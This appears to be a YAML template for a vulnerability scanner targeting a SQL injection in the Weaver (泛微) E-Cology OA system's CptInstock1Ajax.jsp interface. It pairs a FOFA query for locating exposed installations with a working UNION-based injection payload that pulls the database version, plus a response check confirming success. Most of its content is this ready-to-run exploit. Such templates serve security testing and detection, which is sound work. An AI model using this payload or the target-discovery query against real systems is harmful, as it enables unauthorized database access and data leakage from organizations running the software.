product: 泛微 E-Cology
vName: 泛微E-Cology CptInstock1Ajax接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞，可获取数据库权限，导致数据泄露。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1#
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - Microsoft
              - Server
            logic: 'and'